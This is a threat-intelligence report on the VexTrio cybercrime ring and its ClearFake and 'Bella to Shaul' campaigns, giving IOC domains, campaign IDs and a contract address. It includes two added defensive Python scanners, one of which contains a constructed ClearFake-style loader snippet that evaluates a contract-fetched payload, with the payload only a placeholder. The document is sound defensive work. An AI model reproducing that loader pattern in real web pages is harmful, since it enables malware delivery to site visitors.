VexTrio: Inside a global cybercrime ring

Executive Summary 

During routine review of zero-hour alerts, the Menlo Security Threat Intelligence team discovered users visiting compromised sites. These sites are part of a larger criminal organization, VexTrio, which operates a Traffic Direction System (TDS). We saw two notable campaigns associated with this organization and what appeared to be an infrastructure change. In this write-up we discuss what we saw from the victim’s point of view when visiting this cybercrime ring's infrastructure.

What is a Traffic Direction System (TDS)? A TDS is a system that uses a network of hacked servers to route victims to domains that distribute malware, serve ads, or run scamming schemes.

VexTrio: Anatomy of a cybercrime ring

VexTrio runs an affiliate program that gives affiliates access to its TDS. Attackers compromise WordPress websites, injecting malicious JavaScript that routes traffic to the TDS based on specific criteria (discussed below). Depending on the victim's operating system (OS) fingerprint, they are routed to different affiliates. Infoblox published an article, written by Christopher Kim and Randy McEoin, describing their discovery of VexTrio in January 2024. We will focus on two campaigns Menlo has unique insight into: the “Bella turned Shaul” campaign and “ClearFake”.

https://blogs.infoblox.com/threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/

Campaign 1: Bella to Shaul 

The Bellatrixmeissa domain is a malicious site, previously reported by Malwaretips and others, that uses social engineering tactics to trick users into enabling browser notifications. Victims are then bombarded with ads that subtly advertise a range of malware, from greyware to Gootloader. Menlo Security has observed this attack across Asia, North America, Europe, the Middle East, Australia, and South America.

When investigating this, we uncovered how prolific this campaign had been across Menlo customers since March, and we uncovered a shift to new infrastructure: shauladubhe[.]com. As activity associated with Bellatrixmeissa declined, the rate of Shauladubhe activity rapidly increased, showing the threat actors moving their operation from one to the other.

Past 215 days' activity across all customers. Taken 15th October.

Over 140 days, the following campaign IDs were identified within our environment:

  • CHbdBrRj60iP0ZNnHuMm7w 
  • EOLqXWl7sEqTC3w7GMZt4A 
  • l-C8wnA9n02pICp-zt1xVA 
  • TMO4rBkyiESdae2M5urijA 
  • CHiI7Gh3GUyTa8XGgNqDyQ 

Adware

With high probability we assess that VexTrio is involved, as key identifiers of their previous attacks are reported to be:

  • A translator JavaScript file: trls.js
    • (e.g. SHA256: e2bb1401d6b8d6038ff8411fd0f6280890ecd1f32e3e90f4c7fededf2801339)
    • URL paths: /space-robot/ and /eyes-robot/
  • (Further IOCs are included under references)

In these attacks we were able to see both of the previously reported IOCs above, leading us to assess with high probability that this is also VexTrio.

Campaign 2: ClearFake 

ClearFake is a malicious JavaScript framework that dynamically presents website visitors with harmful content via an HTML iframe. Users are tricked into clicking a fake browser update button that eventually leads to a malware infection (e.g. the Amadey infostealer). We know that ClearFake has been an affiliate of VexTrio for at least five months. 

ClearFake Attack Chain:

  1. User visits the compromised website injected with malicious JavaScript.
  2. The injected code calls the API of the popular cryptocurrency exchange platform Binance.
  3. Obfuscated JavaScript is returned and evaluated.
  4. The ClearFake TDS, running Keitaro, is called.
  5. The response from Keitaro is a redirection to the VexTrio TDS.

From https://blogs.infoblox.com/threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/

Internal customer data showing compromised sites referring to ClearFake. 

Unraveling the ClearFake chain 

When users visit the compromised site, a script runs to fingerprint their browser (rocketlazyloadscript). If the user's browser is Internet Explorer and meets other conditions, the script rewrites the current URL to include a ‘nowprocket’ parameter and then reloads the page with the new URL.

The script then triggers the Binance/ClearFake script called “ethers.js” to run. 

These conditions are based on various events, such as when the page has fully loaded (window.onload), when the user navigates to the page via the back or forward buttons (the pageshow event), and when the Document Object Model (DOM) is ready (the DOMContentLoaded event).

However, in this example, when the “ethers.js” script runs it attempts to pull down another script. This fails, and the response is a console log message in Chinese meaning “there is no more”. Below you can see the console log message in base64. This also suggests that, for this contract, the next stage is not loaded.

Console log responses, cleaned up via an internal analyst tool.

Notably, there appears to be a possible generic API key used to interact with “ethers[.]io” that loads automatically when the user visits the compromised site.

In the console log area, we can see the compromised site trying to inject a script into the ethers.js script running on the compromised site.
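The chain above (compromised page loads ethers.js, talks to a Binance Smart Chain RPC endpoint, reads a contract and evaluates what comes back) leaves a recognisable footprint in captured page source. The following scanner is an added example written for this write-up; it is not Menlo Security's tooling nor any code from the campaign. The indicator strings (cdn.ethers.io, bsc-dataseed1.binance.org, the contract address and the ‘nowprocket’ parameter) are taken from the text; the two HTML samples are constructed, the "eval of a fetched string" heuristic and the scoring rule are assumptions, and the payload in the suspicious sample is a placeholder.

```python
"""Static scan of captured page source for the ClearFake loader pattern.

Added example; not Menlo Security's tooling nor code from the campaign.
Indicator strings come from the write-up; samples, the eval heuristic and
the scoring rule are assumptions of this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicators named in the write-up, plus one heuristic for stage 3 (eval).
INDICATORS = {
    "ethers_cdn": re.compile(r"cdn\.ethers\.io", re.I),
    "bsc_rpc": re.compile(r"bsc-dataseed1\.binance\.org", re.I),
    "contract_addr": re.compile(r"0xdf20921ea432318dd5906132edbc0c20353f72d6", re.I),
    "nowprocket_param": re.compile(r"[?&]nowprocket", re.I),
    # Heuristic (assumption): stage 3 evaluates a string returned by the contract.
    "eval_call": re.compile(r"\beval\s*\(", re.I),
}

SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)


@dataclass
class ScanResult:
    hits: list[str] = field(default_factory=list)
    external_scripts: list[str] = field(default_factory=list)
    verdict: str = "clean"


def extract_script_srcs(html: str) -> list[str]:
    """Return the src of every external <script> tag, in document order."""
    return SCRIPT_SRC_RE.findall(html)


def scan_page(html: str) -> ScanResult:
    """Match indicators and combine them into a verdict.

    A legitimate dApp also loads ethers.js, so a lone hit only earns 'review'.
    The known contract address, or the full combination of ethers loader +
    chain RPC endpoint + eval of the returned payload, matches the chain in
    the write-up and earns 'clearfake-like'.
    """
    result = ScanResult(external_scripts=extract_script_srcs(html))
    for name, pattern in INDICATORS.items():
        if pattern.search(html):
            result.hits.append(name)
    hits = set(result.hits)
    if "contract_addr" in hits or {"ethers_cdn", "bsc_rpc", "eval_call"} <= hits:
        result.verdict = "clearfake-like"
    elif hits:
        result.verdict = "review"
    return result


# Constructed sample: a page that legitimately loads ethers.js for a wallet UI.
BENIGN_HTML = """<html><head>
<script src="https://cdn.ethers.io/lib/ethers.umd.min.js"></script>
<script>
  async function connect() {
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    await provider.send("eth_requestAccounts", []);
  }
</script></head><body><button onclick="connect()">Connect</button></body></html>"""

# Constructed sample mirroring the chain in the write-up. The contract method
# name and the base64 payload are placeholders, not the real stage 3.
SUSPICIOUS_HTML = """<html><head>
<script src="https://cdn.ethers.io/lib/ethers.umd.min.js"></script>
<script>
  const provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/");
  const contract = new ethers.Contract("0xdf20921ea432318dd5906132edbc0c20353f72d6", [], provider);
  contract.placeholderMethod().then(function (payload) { eval(atob("PAYLOAD_PLACEHOLDER")); });
</script></head></html>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        r = scan_page(sample)
        print(f"{label}: verdict={r.verdict} hits={r.hits} scripts={r.external_scripts}")
```

The verdict logic is deliberately conservative: ethers.js on its own is common on legitimate Web3 front ends, so a single hit is routed to review rather than flagged, while the observed contract address or the full loader-plus-RPC-plus-eval combination is what actually distinguishes the ClearFake injection from ordinary dApp code.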

Contract analysis

The contract address used in this attack was 0xdf20921ea432318dd5906132edbc0c20353f72d6. We can see a couple of transactions listed, and some of them appear to be spam related.

https://blockchair.com/polygon/address/0xdf20921ea432318dd5906132edbc0c20353f72d6

Another contract we saw but didn’t include in this analysis is 0x34585777843Abb908a1C5FbD6F3f620bC56874AA.

Impact and conclusion

We assess that the VexTrio cybercrime ring will continue to be a prevalent and substantial global threat, impacting all sectors with its large-scale operation. We will continue to monitor related campaigns.

Visiting a compromised WordPress site that is part of the VexTrio cybercrime ring poses significant risks to users, organizations, and the broader internet ecosystem. These sites are used to deliver a variety of payloads including, but not limited to, adverts, PUPs and malware. This undermines cybersecurity efforts and creates severe consequences for organizations:

  1. Data Theft and Privacy Breaches: Compromised sites can harvest personal information, including login credentials, financial details, and sensitive data. 
    • If a user's privacy is severely compromised, it could lead to identity theft, financial loss, or abuse of corporate credentials.
  2. Malware Infection: These sites frequently distribute malware that can infect users' devices. Once malware is installed, it can lead to system damage, data corruption, and unauthorized access to personal and organizational networks.
  3. Financial Loss: Users may face direct financial losses due to stolen payment information or indirect costs from repairing malware damage.  
    • Additionally, businesses can suffer financial repercussions from reputational damage and legal liabilities as well as restoring infected systems. 
  4. Spread of Cybercrime: By interacting with these sites, users inadvertently contribute to the cybercrime ecosystem. This activity supports the operation of criminal networks and enables them to perpetuate further cyber attacks.
  5. Compromised Network Security: Infected devices can become entry points for broader network attacks, affecting entire organizations. This can result in significant disruptions, data breaches, and extensive recovery efforts.
  6. Erosion of Trust: The prevalence of compromised sites erodes trust in digital platforms and services. Users become wary of online interactions, which can stifle online engagement.

IOCs

Domains

  • cebue[.]check-tl-ver-106-1[.]com
  • ja[.]check-tl-ver-246-3[.]com
  • mvgde[.]check-tl-ver-116-2[.]com
  • pojyq[.]check-tl-ver-246-3[.]com
  • rqstz[.]check-tl-ver-54-1[.]com
  • ud[.]check-tl-ver-54-1[.]com
  • qltuh[.]bellatrixmeissa[.]com
  • qltuh[.]shauladubhe[.]com
  • *[.]shauladubhe[.]com
  • qltuh[.]check-tl-ver-246-3[.]com
  • qltuh[.]check-tl-ver-116-3[.]com
  • qltuh[.]check-tl-ver-176-1[.]com
  • xx62hrg[.]megabonus-gains[.]life
  • bsc-dataseed1[.]binance[.]org
  • cdn[.]ethers[.]io

URL paths that are campaigns

  • CHbdBrRj60iP0ZNnHuMm7w
  • EOLqXWl7sEqTC3w7GMZt4A
  • l-C8wnA9n02pICp-zt1xVA
  • TMO4rBkyiESdae2M5urijA
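The indicators above, together with the campaign IDs and the /space-robot/, /eyes-robot/ and trls.js markers from the "Bella to Shaul" section, can be turned directly into a proxy-log match. The script below is an added example written for this write-up, not Menlo Security's tooling. The hosts, wildcard, campaign IDs and path markers are taken from the page; the regex that generalises the check-tl-ver-NNN-N host shape, the severity mapping, the log line format and the log lines themselves are constructed assumptions of this example. Note that bsc-dataseed1[.]binance[.]org and cdn[.]ethers[.]io are legitimate services that the ClearFake chain merely uses, so the example reports them as context rather than as a block-worthy match.

```python
"""Match web-proxy log lines against the VexTrio indicators in this write-up.

Added example, not Menlo Security's tooling. Hosts, wildcard, campaign IDs
and path markers come from the IOC list and the "Bella to Shaul" section;
the check-tl-ver regex, severity mapping, log format and log lines are
assumptions constructed for this example.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

EXACT_HOSTS = {
    "qltuh.bellatrixmeissa.com",
    "qltuh.shauladubhe.com",
    "xx62hrg.megabonus-gains.life",
}
WILDCARD_SUFFIXES = (".shauladubhe.com",)
# The listed check-tl-ver-NNN-N hosts share one shape; matching the shape
# also catches subdomains not yet on the list (assumption: worth the noise).
CHECK_TL_RE = re.compile(r"^[a-z0-9]+\.check-tl-ver-\d+-\d+\.com$", re.I)
# Legitimate services used as stages of the ClearFake chain: context only.
CONTEXT_HOSTS = {"bsc-dataseed1.binance.org", "cdn.ethers.io"}
CAMPAIGN_IDS = {
    "CHbdBrRj60iP0ZNnHuMm7w", "EOLqXWl7sEqTC3w7GMZt4A", "l-C8wnA9n02pICp-zt1xVA",
    "TMO4rBkyiESdae2M5urijA", "CHiI7Gh3GUyTa8XGgNqDyQ",
}
PATH_MARKERS = ("/space-robot/", "/eyes-robot/", "trls.js")

SEVERITY = {  # assumption: how an analyst might rank each reason
    "ioc-host": "high", "ioc-wildcard-host": "high", "check-tl-ver-pattern": "high",
    "campaign-id-path": "high", "vextrio-path-marker": "medium",
    "legit-service-seen-in-chain": "info",
}


def classify_url(url: str) -> list[str]:
    """Return the reasons a URL matches; an empty list means nothing of interest."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons: list[str] = []
    if host in EXACT_HOSTS:
        reasons.append("ioc-host")
    elif any(host.endswith(suffix) for suffix in WILDCARD_SUFFIXES):
        reasons.append("ioc-wildcard-host")
    elif CHECK_TL_RE.match(host):
        reasons.append("check-tl-ver-pattern")
    if host in CONTEXT_HOSTS:
        reasons.append("legit-service-seen-in-chain")
    first_segment = parts.path.strip("/").split("/")[0]
    if first_segment in CAMPAIGN_IDS:
        reasons.append("campaign-id-path")
    if any(marker in parts.path for marker in PATH_MARKERS):
        reasons.append("vextrio-path-marker")
    return reasons


def severity(reasons: list[str]) -> str:
    """Highest severity among the reasons, or 'none' for an empty list."""
    levels = {SEVERITY[r] for r in reasons}
    return next((lvl for lvl in ("high", "medium", "info") if lvl in levels), "none")


def scan_log(lines) -> list[dict]:
    """Constructed format: '<timestamp> <client-ip> <method> <url> <status>'."""
    findings = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 4 or not fields[3].startswith("http"):
            continue
        reasons = classify_url(fields[3])
        if reasons:
            findings.append({"line": number, "client": fields[1], "url": fields[3],
                             "reasons": reasons, "severity": severity(reasons)})
    return findings


# Constructed log lines for the demonstration (IPs and hosts are invented
# except where they reproduce indicators from the write-up).
SAMPLE_LOG = """\
2024-10-15T09:12:01Z 10.1.2.3 GET https://qltuh.shauladubhe.com/CHbdBrRj60iP0ZNnHuMm7w 302
2024-10-15T09:12:02Z 10.1.2.3 GET https://zzzz9.check-tl-ver-301-2.com/ 200
2024-10-15T09:13:40Z 10.1.2.9 GET https://www.example.com/wp-content/uploads/space-robot/trls.js 200
2024-10-15T09:14:05Z 10.1.2.9 GET https://www.example.org/index.html 200
2024-10-15T09:15:22Z 10.1.2.7 GET https://cdn.ethers.io/lib/ethers.umd.min.js 200
"""


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

Matching on the check-tl-ver host shape rather than only on the listed subdomains is the one deliberate generalisation here: the IOC list shows the same pattern with different labels and counters, so a shape match catches rotations of the same infrastructure, at the cost of needing review if a legitimate host ever happens to fit it.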

References

VexTrio at the Center of Affiliate Cybercrime Program | Infoblox

JavaScript Malware Switches to Server-Side Redirects & DNS TXT Records as TDS

Bellatrixmeissa.com Virus: What Is It And How To Stop Pop-ups
